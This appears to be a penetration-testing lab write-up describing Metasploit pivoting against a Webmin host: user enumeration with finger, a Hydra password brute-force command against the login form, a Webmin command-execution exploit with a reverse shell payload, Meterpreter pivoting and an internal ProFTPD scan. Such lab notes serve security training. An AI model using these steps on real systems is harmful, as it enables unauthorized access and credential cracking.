Home Metasploit Pivoting II
Post
Cancel

Metasploit Pivoting II

Posted Jun 8, 2022 Updated Apr 15, 2023
By
3 min read

Steps Taken:

1. NMAP-ing the nearby network to figure out what services the first target machine is using:
1

nmap -sV --script=banner 192.39.205.3

2. Scan users using ‘finger’ service:
1

	- Using the default wordlist:


1

- Using the hinted wordlist:

3. Using ‘finger’ service to acquire information about this user:
1

finger access@{ip}

4. Trying to do a GET request from this server:

1
2

- How can I make a request with SSL enabled then?
- Add 's' to make it 'https':


1

- Still doesn't work due to the EE certificate key being too weak.
5. Using the exploit/unix/webapp/webmin_show_cgi_exec :

1
2

- Notice that the variable we really have to get in here is the "PASSWORD" one.
- Since we don't have it we have to crack it with the username access.
6. Trying to get /etc/passwd using exploit : “auxiliary/admin/webmin/file_disclosure”

1
2
3
4
5
6

	- Notice that it is accessible but you would need to be authenticated which is ironic since we're trying to find information about the passwords of the users of this service.
	- This is on the directory /unauthenticated as the starting point.
	- This output shows us that there is an HTTPS form and you have to log in first!
	- An important URI in here is:/session_login.cgi that uses POST method to log into the form.
	- The variable used for the username box above is 'user'.
	- The variable used for the password box above is 'pass'.
7. Cracking the password for user ‘access’ with Hydra:
1

hydra {target} -l access -P {wordlist} https-form-post "/session_login.cgi:user=^USER^&pass=^PASS^:{error_message}" -s 10000 -f -V

1
2
3
4

	-> Note that the error message will show to you anyway if you try to use Hydra without it the first time.
	-> You can show the login as failed on the third parameter of https-form-post using ":F= or :S=" but which one to use in this?
	-> "-s" flag specifies the port used on the web server.
	-> in this case, wordlist used is: /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt

8. Executing the exploit:

1
2

- the exploit works but it doesn't create a session for some reason.
- After trying different payloads, it seems to work with cmd/unix/reverse_python:

9. Upgrade the shell into Meterpreter shell:
1

		msf > sessions -u 1


1

- Now, you can get information about the internal subnet of the first target machine.


1

- Internal subnet = 192.121.3.0/24
10. Creating pivot on this compromised machine:

1

- Add socks4a proxy as well to be able to nmap the internal machine from the attacker's machine.

Note: Notice that when ‘portfwd’ is used, you don’t have to use proxychains.! Look at the walkthrough for the alternative using ‘portfwd’ without the use of proxychains. This shows that when you can’t use Metasploit at all, you can use proxychains to do the pivoting.

11. Scanning the target machine-internal from the attacker’s machine using NMAP+Proxychains:

1

- Since the service and its version is showing to us, we can assume this isn't behind a firewall and there would be no need to use portfwd from Meterpreter shell.
12. Find whether there are exploits in this service and version to which this is vulnerable to:
1

searchsploit proftpd 1.3.3c


1

- Use this!

Pentesting, Pivoting
Pentester Academy Metasploit
This post is licensed under CC BY 4.0 by the author.
Recently Updated